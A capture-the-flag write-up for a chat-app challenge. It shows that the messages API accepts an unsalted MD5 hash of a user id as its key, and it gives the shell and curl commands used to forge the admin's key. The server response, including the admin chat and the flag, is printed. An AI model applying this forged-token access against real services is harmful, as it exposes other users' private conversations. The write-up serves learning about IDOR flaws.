Door Paradox

But let’s go back to the point of the competition. We wrote a messenger for you, because we want you to be comfortable talking. Account for you: test:test

URL: http://sherlock-message.ru

Recon

Chat application. You login as test:test and you are user id 3.

There is an API endpoint /api/messages.getByDialog that takes an user_id in the form of a md5 hash. It returns a chat history.

For our test user (id: 3) this is:

echo -n "3" | md5sum
eccbc87e4b5ce2fe28308fd9f2a7baf3

Imitate admin

We can imitate the admin user by pretending we are user_id=1.

curl 'http://sherlock-message.ru/api/messages.getByDialog' --data 'user_id=2&key=c4ca4238a0b923820dcc509a6f75849b'

We will see the admin's user_id=1 chat history with user_id=2:

{
    "response": {
        "members": {
            "first": {
                "id": 1,
                "nickname": "Admin1"
            },
            "second": {
                "id": 2,
                "nickname": "Admin2"
            }
        },
        "messages": [
            {
                "from_member": "second",
                "message": "ewq"
            },
            {
                "from_member": "second",
                "message": "\u041d\u0443 \u0434\u0430\u0432\u0430\u0439 \u0442\u043e\u0433\u0434\u0430 FLAG{iD00r_with_insecure_token}"
            },
            {
                "from_member": "first",
                "message": "\u041d\u0435, \u043d\u0443 \u044f \u043d\u0435 \u0437\u043d\u0430\u044e.. \u0438\u043c \u0436\u0435 \u043d\u0430\u0434\u043e \u0432\u044b\u0438\u0433\u0440\u044b\u0432\u0430\u0442\u044c"
            }
        ]
    },
    "status": "success"
}

Which contains a flag.

Flag

FLAG{iD00r_with_insecure_token}